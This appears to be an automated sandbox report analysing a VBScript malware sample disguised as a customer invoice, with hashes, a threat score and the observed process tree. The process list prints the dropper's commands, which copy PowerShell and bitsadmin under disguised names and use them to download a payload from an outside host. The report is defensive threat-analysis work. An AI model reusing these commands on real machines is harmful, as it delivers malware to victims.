Analysis
-
max time kernel
65s -
max time network
68s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13-07-2020 07:40
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_07008120482.vbs
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_07008120482.vbs
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
Fatt_cliente_07008120482.vbs
-
Size
4KB
-
MD5
740e42ba34a3eb4f22a7f2ce3a738a5c
-
SHA1
ad8a96ca8d57f0d18ff06366d507d547deb051b0
-
SHA256
1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839
-
SHA512
f15559533b8dadf6571e141347db4c90c4679fd57346760a4912d94d6dcc33b4049bc93565ae9acb75324b039c065f78a294dfff9594a73a6d7fcdbfee3bba54
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.exedescription pid process target process PID 2916 wrote to memory of 416 2916 WScript.exe cmd.exe PID 2916 wrote to memory of 416 2916 WScript.exe cmd.exe PID 2916 wrote to memory of 808 2916 WScript.exe cmd.exe PID 2916 wrote to memory of 808 2916 WScript.exe cmd.exe PID 2916 wrote to memory of 812 2916 WScript.exe wubvVZY.exe PID 2916 wrote to memory of 812 2916 WScript.exe wubvVZY.exe PID 2916 wrote to memory of 812 2916 WScript.exe wubvVZY.exe -
Executes dropped EXE 1 IoCs
Processes:
wubvVZY.exepid process 812 wubvVZY.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_07008120482.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zwubvVZY.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\wubvVZY.exe2⤵
-
C:\Users\Admin\AppData\Roaming\wubvVZY.exe"C:\Users\Admin\AppData\Roaming\wubvVZY.exe" /transfer VWCWnV /download https://sheyenneweber.com/webol/07008120482/logo.jpg C:\Users\Admin\AppData\Roaming\logo.jpg2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\wubvVZY.exe
-
C:\Users\Admin\AppData\Roaming\wubvVZY.exe
-
memory/416-1-0x0000000000000000-mapping.dmp
-
memory/808-2-0x0000000000000000-mapping.dmp
-
memory/812-4-0x0000000000000000-mapping.dmp
-
memory/2916-0-0x0000027CB4C00000-0x0000027CB4C04000-memory.dmpFilesize
16KB